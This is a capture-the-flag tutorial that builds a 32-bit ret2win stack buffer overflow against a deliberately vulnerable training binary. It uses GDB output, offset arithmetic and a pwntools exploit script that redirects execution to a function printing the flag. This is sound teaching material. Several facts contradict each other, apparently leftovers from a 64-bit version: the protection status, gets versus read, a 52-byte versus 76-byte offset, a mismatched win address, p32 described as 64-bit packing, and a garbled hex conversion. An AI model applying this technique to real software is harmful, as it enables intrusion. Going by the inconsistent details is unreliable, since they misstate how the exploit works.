Try a 32-bit overflow! This is the same as a 64-bit, but the numbers get packed using p32
instead of p64
.
If you look at the challenge solution, it uses an old version of the challenge. This uses a function called gets()
which is unrealistic because every compiler strongly warns not to use it. The modernized version uses read()
, a system call that many real-life binaries will use.
Same challenge, different architecture.
Let's make the first security check using checksec
.
[*] '/ironforge/chall' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)
The first and probably most important thing is that this is a 32-bit binary. This means that when we pass parameters, we will pass them on the stack. The top of the stack, when call
is reached is the first parameter, the second top is the second parameter, etc.
We see that all protections are disabled. The most important check for the buffer overflow is that the canary is disabled.
Let's go into GDB and find where this function takes input. Inside read_in
:
0x080491fc <+59>: push 0x40 0x080491fe <+61>: lea eax,[ebp-0x30] 0x08049201 <+64>: push eax 0x08049202 <+65>: push 0x0 0x08049204 <+67>: call 0x8049040 <read@plt>
We see that this program uses gets
for input. The man
pages says this about gets
:
SYNOPSIS #include <unistd.h> ssize_t read(int fd, void buf[.count], size_t count); DESCRIPTION read() attempts to read up to count bytes from file descriptor fd into the buffer starting at buf.
In this case, read
is offered 0x30
bytes of space to write, but allows the user to write 0x40
bytes. This is a buffer overflow vulnerability! This is the vulnerability that we are going to exploit.
Now that both vulnerability prerequisites have been checked, let's start figuring out how to execute the buffer overflow.
Let's do our analysis in GDB assuming that we don't have the source code (because, typically, we won't) and just use it to explain why things happen.
First, we check the functions available:
gef➤ info functions All defined functions: Non-debugging symbols: 0x08049000 _init 0x08049030 __libc_start_main@plt 0x08049040 read@plt 0x08049050 fflush@plt 0x08049060 puts@plt 0x08049070 system@plt 0x08049080 _start 0x080490ad __wrap_main 0x080490c0 _dl_relocate_static_pie 0x080490d0 __x86.get_pc_thunk.bx 0x080490e0 deregister_tm_clones 0x08049120 register_tm_clones 0x08049160 __do_global_dtors_aux 0x08049190 frame_dummy 0x08049196 win 0x080491c1 read_in 0x08049212 main 0x08049252 __x86.get_pc_thunk.ax 0x08049258 _fini
The three functions that we are interested in are win
, read_in
, and main
. win
logically appears to be the target, so let's figure out what happens there:
gef➤ disas win Dump of assembler code for function win: 0x08049196 <+0>: push ebp 0x08049197 <+1>: mov ebp,esp 0x08049199 <+3>: push ebx 0x0804919a <+4>: sub esp,0x4 0x0804919d <+7>: call 0x8049252 <__x86.get_pc_thunk.ax> 0x080491a2 <+12>: add eax,0x2e52 0x080491a7 <+17>: sub esp,0xc 0x080491aa <+20>: lea edx,[eax-0x1fec] 0x080491b0 <+26>: push edx 0x080491b1 <+27>: mov ebx,eax 0x080491b3 <+29>: call 0x8049070 <system@plt> 0x080491b8 <+34>: add esp,0x10 0x080491bb <+37>: nop 0x080491bc <+38>: mov ebx,DWORD PTR [ebp-0x4] 0x080491bf <+41>: leave 0x080491c0 <+42>: ret
win
makes a call to system
, which the man
pages says takes a char*
(string) argument. From the source code, we see that this takes the argument "cat flag.txt" meaning that it opens the flag file and prints us its contents.
strings
on the binary to find the flag.Now, let's check main
:
gef➤ disas main Dump of assembler code for function main: 0x08049212 <+0>: lea ecx,[esp+0x4] 0x08049216 <+4>: and esp,0xfffffff0 0x08049219 <+7>: push DWORD PTR [ecx-0x4] 0x0804921c <+10>: push ebp 0x0804921d <+11>: mov ebp,esp 0x0804921f <+13>: push ebx 0x08049220 <+14>: push ecx 0x08049221 <+15>: call 0x80490d0 <__x86.get_pc_thunk.bx> 0x08049226 <+20>: add ebx,0x2dce 0x0804922c <+26>: call 0x80491c1 <read_in> 0x08049231 <+31>: sub esp,0xc 0x08049234 <+34>: lea eax,[ebx-0x1fb8] 0x0804923a <+40>: push eax 0x0804923b <+41>: call 0x8049060 <puts@plt> 0x08049240 <+46>: add esp,0x10 0x08049243 <+49>: mov eax,0x0 0x08049248 <+54>: lea esp,[ebp-0x8] 0x0804924b <+57>: pop ecx 0x0804924c <+58>: pop ebx 0x0804924d <+59>: pop ebp 0x0804924e <+60>: lea esp,[ecx-0x4] 0x08049251 <+63>: ret
We see that main
just appears to call read_in
and then return. So, let's go check read_in
:
Dump of assembler code for function read_in: 0x080491c1 <+0>: push ebp 0x080491c2 <+1>: mov ebp,esp 0x080491c4 <+3>: push ebx 0x080491c5 <+4>: sub esp,0x34 0x080491c8 <+7>: call 0x80490d0 <__x86.get_pc_thunk.bx> 0x080491cd <+12>: add ebx,0x2e27 0x080491d3 <+18>: sub esp,0xc 0x080491d6 <+21>: lea eax,[ebx-0x1fdc] 0x080491dc <+27>: push eax 0x080491dd <+28>: call 0x8049060 <puts@plt> 0x080491e2 <+33>: add esp,0x10 0x080491e5 <+36>: mov eax,DWORD PTR [ebx-0x4] 0x080491eb <+42>: mov eax,DWORD PTR [eax] 0x080491ed <+44>: sub esp,0xc 0x080491f0 <+47>: push eax 0x080491f1 <+48>: call 0x8049050 <fflush@plt> 0x080491f6 <+53>: add esp,0x10 0x080491f9 <+56>: sub esp,0x4 0x080491fc <+59>: push 0x40 0x080491fe <+61>: lea eax,[ebp-0x30] 0x08049201 <+64>: push eax 0x08049202 <+65>: push 0x0 0x08049204 <+67>: call 0x8049040 <read@plt> 0x08049209 <+72>: add esp,0x10 0x0804920c <+75>: nop 0x0804920d <+76>: mov ebx,DWORD PTR [ebp-0x4] 0x08049210 <+79>: leave 0x08049211 <+80>: ret
We see that this is where read()
is called and where we will overflow the buffer. We also notice that malloc()
has yet to be called, meaning that the data is not being placed on the heap.
To confirm this, we check what's being passed to read()
. Let's set a breakpoint right before the call to read()
and check:
gef➤ x/3wx $esp 0xffffce70: 0x00000000 0xffffce88 0x00000040
x/3wx $esp
(or pxw @ esp
in radare2) shows me the 3 values on the top of the stack. In 32-bit, this is how we pass parameters. This shows that 0xffffce88
is being passed as the parameter to read()
, which is the address of the buffer.
Something peculiar that we notice is that 0xffffce88
(the location we're writing to) is close to the stack pointer (0xffffce88
). I wonder, are we writing to the stack? The short answer is yes, but let's confirm. Run info proc mappings
or vmmap
(dm
in radare2) to check the bounds of the various memory segments:
gef➤ vmmap 0xffffce88 [ Legend: Code | Heap | Stack ] Start End Offset Perm Path 0xfffdd000 0xffffe000 0x00000000 rw- [stack]
We see that our stack is located between 0xfffdd000
and 0xffffe000
. Our buffer address is inside this range, meaning we are writing to the stack.
Remember earlier that I said that read()
does no bounds checking, meaning that we can write as many bytes as we want? There are some important things on the stack right now, let's go check them out.
gef➤ x/20wx $esp 0xffffce70: 0x00000000 0xffffce88 0x00000040 0x080491cd 0xffffce80: 0xf7ffcfd8 0x00000028 0x00000000 0xffffdfa9 0xffffce90: 0xf7fc8570 0xf7fc8000 0x00000000 0x00000000 0xffffcea0: 0x00000000 0x00000000 0x00000000 0x00000000 0xffffceb0: 0xffffffff 0x0804bff4 0xffffcec8 0x08049231
This looks like a lot of gibberish, but two numbers stand out in particular:
gef➤ x/wx 0xffffce7c 0xffffce7c: 0x080491cd gef➤ x/wx 0xffffcebc 0xffffcebc: 0x08049231
Why these two? The short answer is that the numbers were different! If we check info proc mappings
again, we see:
gef➤ vmmap 0x080491cd 0x08049231 [ Legend: Code | Heap | Stack ] Start End Offset Perm Path 0x08049000 0x0804a000 0x00001000 r-x /ironforge/chall
This is executable memory located inside the win32
file. This is the text segment. This means that these locations are addresses in the code. Let's check what's here:
gef➤ x/i 0x080491cd 0x80491cd <read_in+12>: add ebx,0x2e27 gef➤ x/i 0x08049231 0x8049231 <main+31>: sub esp,0xc
We see that these both point to instructions. The first one points to somewhere at the top of read_in
, and the second one back in main
. The first one is our base pointer (aka rbp
) and the second one is the return pointer.
Let's understand how this happened.
When a function is called, the following happens:
call
instruction.Dump of assembler code for function read_in: 0x080491c1 <+0>: push ebp 0x080491c2 <+1>: mov ebp,esp 0x080491c4 <+3>: push ebx 0x080491c5 <+4>: sub esp,0x34
When the function returns, the following happens:
0x0804920c <+75>: nop 0x0804920d <+76>: mov ebx,DWORD PTR [ebp-0x4] 0x08049210 <+79>: leave 0x08049211 <+80>: ret
leave
is a keyword for mov rsp, rbp ; pop rbp
. This return the base and stack pointers to their values before they were modified in the prologue. This resets the stack frame to the stack frame of the calling function.pop rip
)How do we leverage this?
read_in
, we subtract from the stack pointer.Let's make this happen.
We are still breakpointed at the call to gets()
. Let's check the stack again:
gef➤ x/3wx $esp 0xffffce70: 0x00000000 0xffffce88 0x00000040
This is the address we are going to write to. As a reminder, this is where we found the return pointer:
gef➤ x/wx $esp+0x4c 0xffffcebc: 0x08049231
This means that in order to overwrite the return pointer, we need to write from 0xffffce88
to 0xffffcebc
. How many bytes is this? Let's get some Python practice:
gef➤ !python3 -c "print(0xffffcebc-0xffffce88)" 52
This means that we need to write 76
bytes, and then we need to overwrite the return pointer. But where do we want to go? The win
function! Let's get that address:
gef➤ info functions win All functions matching regular expression "win": Non-debugging symbols: 0x08049196 win
Let's use Python to make this a payload:
$ python3 -c "print('A' * 52 + str(0x080491a6))" AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA134517158
And what happens when we run this?
$ ./win32 Can you figure out how to win here? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA134517158 Segmentation fault (core dumped)
We… crashed. What does that mean? That means we either corrupted memory or we tried to execute memory that we weren't allowed to. Let's retry this in GDB and watch the execution:
[#0] Id 1, Name: "win32", stopped 0x35343331 in ?? (), reason: SINGLE STEP
It's saying that it reached the address 0x35343331
and stopped. What does this mean?
win
function. We need to figure out what happened.Let's dive deeper into what is happening here:
0x353433331
is the hexadecimal of 5431
, which is the start of what's in the payload. We see it's backward because the binary is written in little-endian architecture.134517158
is the hexadecimal of 080491a6
, which is the address of win
.How can we get the hexadecimal to appear correctly in the payload?
This is where pwntools comes in. Pwntools has a packaging function that allows for the packaging of data into the correct size and format. It also gives us a way to send this payload to the binary. Consider the following exploit:
from pwn import * p = process("./chall") payload = b"A" * 52 payload += p32(0x08049196) p.sendline(payload) p.interactive()
Let's break this exploit down:
from pwn import *
-- This imports the pwntools library into the program, just like an #include
in C-type languages.p = process('./chall')
-- This creates a process object that runs the chall
binary.payload = b"A" * 52
-- This creates a variable containing 52 bytes of A
characters. Note that you could use any characters, but A
(0x41
) is a common choice.payload += p32(0x08049196)
-- This packs 0x08049196
(the address of win
) as a 64-bit little-endian byte string. This is appended to our padding.p.sendline(payload)
-- This sends the payload to the process.p.interactive()
-- This allows us to interact with the process after sending the payload.Let's run this exploit:
$ python3 asd.py [+] Starting local process './chall': pid 777254 [*] Switching to interactive mode Can you figure out how to win here? IFC{PL4C3H0LD3R_FL4G_H3R3!} [*] Got EOF while reading in interactive $ [*] Process './chall' stopped with exit code -11 (SIGSEGV) (pid 777254) [*] Got EOF while sending in interactive
We have our flag!